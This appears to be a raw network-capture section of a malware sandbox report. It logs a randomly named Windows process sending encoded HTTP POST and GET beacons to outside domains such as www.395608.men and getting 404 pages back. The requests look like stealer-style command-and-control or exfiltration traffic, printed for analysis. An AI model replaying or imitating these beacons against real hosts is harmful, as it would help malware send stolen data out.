53 7a 6b 76 30 64 69 78 56 67 5a 58 53 49 43 43 59 49 63 47 63 6c 54 61 71 68 51 73 57 44 55 41 36 75 2b 62 4e 6b 30 64 41 62 76 68 73 6b 73 4c 69 70 6a 66 78 2b 4c 49 59 62 75 43 32 33 31 6e 66 47 71 4a 6a 4b 30 70 6a 5a 43 39 36 50 39 67 4d 2f 4b 57 46 32 43 74 6d 72 64 54 65 30 6e 76 79 57 4f 4a 72 43 4a 47 6f 4f 7a 56 54 75 53 4d 6f 53 57 45 73 65 69 52 79 43 6b 44 73 44 44 76 46 6f 79 33 62 4d 67 58 67 59 64 72 75 6e 62 62 45 58 47 4a 54 37 6d 37 51 54 75 31 68 42 46 48 62 6f 62 4a 6d 2b 33 44 41 54 52 50 6b 6f 6b 4f 7a 36 69 55 61 2f 34 53 38 39 58 77 47 43 6b 71 77 56 4d 38 31 44 67 4a 51 55 51 56 67 62 37 34 49 6b 41 6e 4f 38 50 33 63 4f 50 48 32 6b 43 65 34 32 74 58 48 6c 30 30 6a 4b 33 41 42 38 30 70 62 48 53 74 4d 4b 47 35 [TRUNCATED] Data Ascii: oxIxzhP=mQlJ43QWk2uw3qKVZjorDjJ6ZpABV9bVb6mIo4b8q6jWG1Uy9Ybiiou6BkeJ8yvMKtZ2x+r9JG7F/LlzoRSzkv0dixVgZXSICCYIcGclTaqhQsWDUA6u+bNk0dAbvhsksLipjfx+LIYbuC231nfGqJjK0pjZC96P9gM/KWF2CtmrdTe0nvyWOJrCJGoOzVTuSMoSWEseiRyCkDsDDvFoy3bMgXgYdrunbbEXGJT7m7QTu1hBFHbobJm+3DATRPkokOz6iUa/4S89XwGCkqwVM81DgJQUQVgb74IkAnO8P3cOPH2kCe42tXHl00jK3AB80pbHStMKG5/b4oM39ZQjHS/PipE/rboDfRSuZs7SMOnn20ELKSOl8HBMFEBBvhx+IE964kBAmEnWv7wJ8A4eoxqu8uTpOB9uygJVcqB6R0u0qS1+WD2Z86TzPBoVstW0Ja/EpVWuHKkucJb58wx7DRSn1/4jg51jTWYdJlqiGpWIB7mvbQmIUA5fS6wWnCUUBrf/hSOTtmnyeIPLijmUDnLJ+XXgALQMIQIWBkwnAa5Yt/n6dwqdEP/lj4soLl6Enzv0NnXHVaJRTNwxZKdP/qGmZVsRSKkuCA7PanlCTimk8LxJXnUQERrUX0eeCLcpsMTlzCofyTZEclbFjPGd0K3BFGm95qeevv990AmGEDaKBmVzW7i39bbbpyQIgVPu6DqOiH2R1M2XkL5penMWdZ1OxQvpo0gfpjGgKwCQholjPA6iEjk8mR5f2n/rOM/d5BmPVcpeU875hUivIuFWujsvi1pebrOv4Lx/42oS/8j7LcMaOWoLS0C9ts8QDtWhe7pze2j69g3slWQzQ+BT2rCymuJOdyfzgTAjaCd9b27nghAu4zWzcuRxgmwaMr00duTGwFOQiooKSLZbVWhav2NF8g1phTx1SkrVACOEbOA+uV+tCeFzF05A8iQhu0UQp1tKDzixwz8fZPgp5zx1n4q59D4R66tq8Ille/ySA/85 [TRUNCATED]
Jan 11, 2025 07:59:36.622050047 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 06:59:36 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 11, 2025 07:59:36.622062922 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49988	66.29.148.78	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:38.603544950 CET	454	OUT	GET /o7bo/?qHO8p=hd0DQ8&oxIxzhP=rSNp7HYcuB/095ykRTgGSysZZq4Xde7QSp6ZurvXibSiMmwLx7Dds9OPAwuR2izgPvluyMujHD+7ybxpuR33odEligZnH2OkTHNsRhMxWsmYQ7SYFwHbwr8h5cQ73gRv2A== HTTP/1.1 Host: www.dialagiaja18.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Jan 11, 2025 07:59:39.170089006 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 06:59:39 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 11, 2025 07:59:39.170156956 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49989	207.148.38.19	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:44.728250980 CET	703	OUT	POST /vje0/ HTTP/1.1 Host: www.395608.men Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.395608.men Referer: http://www.395608.men/vje0/ Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 43 69 72 55 68 64 63 78 61 74 4f 7a 78 36 57 6e 76 33 4b 44 71 72 6b 55 34 4e 52 6d 32 36 35 41 39 65 63 54 76 6b 70 5a 37 62 38 4a 4b 6b 4c 2b 76 6d 43 51 6d 44 75 64 46 68 7a 77 71 4a 73 5a 55 61 6f 33 43 61 34 56 4e 70 31 4f 72 74 6a 49 7a 53 42 61 41 63 56 50 76 34 4b 49 4d 50 34 58 47 63 4b 49 6e 56 66 6a 47 39 72 67 43 6a 36 43 39 46 6d 6d 42 4e 76 43 6e 32 66 46 37 4b 7a 5a 51 37 68 2b 4e 76 49 70 76 2b 75 62 75 2b 78 56 4c 36 6d 6f 77 76 34 6e 41 46 31 58 37 61 6d 48 4b 55 71 62 2f 64 2f 4d 4f 6f 76 70 68 48 6d 4b 4c 7a 5a 50 4f 35 43 66 65 41 53 49 36 6a 6e 51 64 44 42 55 50 76 41 3d Data Ascii: oxIxzhP=CirUhdcxatOzx6Wnv3KDqrkU4NRm265A9ecTvkpZ7b8JKkL+vmCQmDudFhzwqJsZUao3Ca4VNp1OrtjIzSBaAcVPv4KIMP4XGcKInVfjG9rgCj6C9FmmBNvCn2fF7KzZQ7h+NvIpv+ubu+xVL6mowv4nAF1X7amHKUqb/d/MOovphHmKLzZPO5CfeASI6jnQdDBUPvA=
Jan 11, 2025 07:59:45.835555077 CET	664	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 06:59:45 GMT Content-Type: text/html Content-Length: 479 Connection: close ETag: "651a865d-1df" Server: cdn X-Cache-Status: MISS Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 [TRUNCATED] Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49990	207.148.38.19	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:47.289007902 CET	723	OUT	POST /vje0/ HTTP/1.1 Host: www.395608.men Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.395608.men Referer: http://www.395608.men/vje0/ Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 43 69 72 55 68 64 63 78 61 74 4f 7a 77 61 47 6e 67 77 2b 44 37 37 6b 58 39 4e 52 6d 39 61 35 45 39 65 51 54 76 6d 59 63 34 70 49 4a 4b 42 33 2b 31 6e 43 51 68 44 75 64 4b 42 79 62 33 5a 73 6f 55 61 6b 2f 43 66 51 56 4e 70 78 4f 72 76 37 49 7a 6c 56 5a 42 4d 56 33 6a 59 4b 77 50 2f 34 58 47 63 4b 49 6e 56 4b 2b 47 2b 62 67 65 44 71 43 73 55 6d 6c 4c 74 76 42 67 32 66 46 78 71 79 53 51 37 68 63 4e 74 38 50 76 38 57 62 75 37 64 56 4c 6f 66 61 36 76 35 69 66 56 31 48 2f 37 4c 2b 49 46 47 30 30 4c 6d 47 54 4c 66 4b 74 52 58 67 52 52 52 6e 64 5a 75 6e 4f 54 61 2f 72 54 47 35 48 67 52 6b 52 34 55 64 77 5a 39 39 2b 54 50 54 2b 71 54 52 44 68 46 6f 2b 6c 6d 72 Data Ascii: oxIxzhP=CirUhdcxatOzwaGngw+D77kX9NRm9a5E9eQTvmYc4pIJKB3+1nCQhDudKByb3ZsoUak/CfQVNpxOrv7IzlVZBMV3jYKwP/4XGcKInVK+G+bgeDqCsUmlLtvBg2fFxqySQ7hcNt8Pv8Wbu7dVLofa6v5ifV1H/7L+IFG00LmGTLfKtRXgRRRndZunOTa/rTG5HgRkR4UdwZ99+TPT+qTRDhFo+lmr
Jan 11, 2025 07:59:48.391503096 CET	664	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 06:59:48 GMT Content-Type: text/html Content-Length: 479 Connection: close ETag: "651a865d-1df" Server: cdn X-Cache-Status: MISS Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 [TRUNCATED] Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49991	207.148.38.19	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:49.845706940 CET	1740	OUT	POST /vje0/ HTTP/1.1 Host: www.395608.men Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.395608.men Referer: http://www.395608.men/vje0/ Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 43 69 72 55 68 64 63 78 61 74 4f 7a 77 61 47 6e 67 77 2b 44 37 37 6b 58 39 4e 52 6d 39 61 35 45 39 65 51 54 76 6d 59 63 34 70 51 4a 4b 7a 50 2b 32 41 2b 51 67 44 75 64 48 68 79 59 33 5a 73 31 55 61 4d 37 43 66 55 72 4e 72 5a 4f 71 4b 6e 49 37 30 56 5a 4c 4d 56 33 72 34 4b 4c 4d 50 35 54 47 64 6e 42 6e 56 61 2b 47 2b 62 67 65 47 6d 43 38 31 6d 6c 4e 74 76 43 6e 32 66 5a 37 4b 7a 31 51 37 35 6d 4e 75 51 66 75 49 69 62 75 62 4e 56 49 62 6e 61 79 76 35 67 65 56 30 59 2f 37 48 66 49 46 61 53 30 4c 36 6f 54 4c 6e 4b 6f 77 6d 70 4c 78 64 71 42 70 4b 72 65 45 54 5a 30 54 65 38 4f 7a 63 65 5a 35 34 35 38 70 5a 53 6f 46 6a 33 2f 34 53 63 65 31 70 61 32 31 4c 78 77 62 6b 7a 6b 33 55 54 39 73 74 57 6e 54 47 44 6c 73 6a 63 74 48 48 35 32 77 6f 38 54 57 56 57 4a 72 56 6f 6e 6e 71 4b 35 72 32 63 62 67 4c 6f 32 49 79 75 76 67 46 62 67 6a 68 77 52 32 46 62 2f 53 62 52 52 4d 47 4a 31 77 4a 34 31 51 43 46 6e 46 41 58 4f 52 64 33 63 65 4e 51 7a 6d 59 39 50 63 71 39 62 54 69 51 62 62 31 79 69 36 [TRUNCATED] Data Ascii: oxIxzhP=CirUhdcxatOzwaGngw+D77kX9NRm9a5E9eQTvmYc4pQJKzP+2A+QgDudHhyY3Zs1UaM7CfUrNrZOqKnI70VZLMV3r4KLMP5TGdnBnVa+G+bgeGmC81mlNtvCn2fZ7Kz1Q75mNuQfuIibubNVIbnayv5geV0Y/7HfIFaS0L6oTLnKowmpLxdqBpKreETZ0Te8OzceZ5458pZSoFj3/4Sce1pa21Lxwbkzk3UT9stWnTGDlsjctHH52wo8TWVWJrVonnqK5r2cbgLo2IyuvgFbgjhwR2Fb/SbRRMGJ1wJ41QCFnFAXORd3ceNQzmY9Pcq9bTiQbb1yi6Z0hioJwlFfXEbmxQ8m1MpArdGQ8OWhNaLkw/zY2w0NPvb71H7dQHil4RRBgJ5lVpMl3x6hyTLKzsjM9kAstKGIC5OMCJkGw/sTZkOHOONI0fXcgCECdrYvwNVWdbOat0mSuUXs39PgT/yTLz0YKqh5hOsDhhgjifZtSa9eVnCo0RkXGf9kdcMJ+9oeHutsQU+mgbikCW7gXQsnof4ECnN4aQJuUpHdyOi2JjeroVMlf8UGJ4EnTAjSi1IrDyfnJVJORxtYm2RmQhrVqn5KNT+jr6t1iIKCATSncqOor78Kger3PojKyw2URvoJCIOMO7AU1nLRhmbjXDN4iIMETp98id3o2rfjpJLAQ1do7ylZkNWg/ohMVk7+eryqG4BcaQwSLnLtnxjbUTFEmURruWy5VcCRuAuqneyn/YCHZSaRaCa15N8bb9d/mONFJmt3LbLABmE4LjVgZpdL4moOgjpepO3kZrA+/XM5ofUCAz732cczzO9laGfl79E7aVWD3BV60o7IdHsBIN+dlhEeOfMdyuV/C3y3N8MWAa/q3NkrIthcXXZrWlGn7gMe4tXnwUqB3hrIREQ0pEW+VIMM55zSjen0Yum0Xo8XWULGoFejstV5x+e3iWQ+D1wE1HAGld7qP+cTjsfwoLObWwQHn8JnEJl2/zAVW7Hh [TRUNCATED]
Jan 11, 2025 07:59:50.951680899 CET	664	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 06:59:50 GMT Content-Type: text/html Content-Length: 479 Connection: close ETag: "651a865d-1df" Server: cdn X-Cache-Status: MISS Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 [TRUNCATED] Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49992	207.148.38.19	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:52.382626057 CET	447	OUT	GET /vje0/?oxIxzhP=PgD0irRMU+WxztOGjHePrbo3+M5iw7Ze2+IGg2QLz7FMOzLFiXmHtGXqLFzGr5U9fZcqMpJpM7Axvujr/nFFBrdsgaecL8wXZcPHmyvVDo/vbTD/8GqtNcyVsEL78fmdJw==&qHO8p=hd0DQ8 HTTP/1.1 Host: www.395608.men Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Jan 11, 2025 07:59:53.498323917 CET	664	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 06:59:53 GMT Content-Type: text/html Content-Length: 479 Connection: close ETag: "651a865d-1df" Server: cdn X-Cache-Status: MISS Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 [TRUNCATED] Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
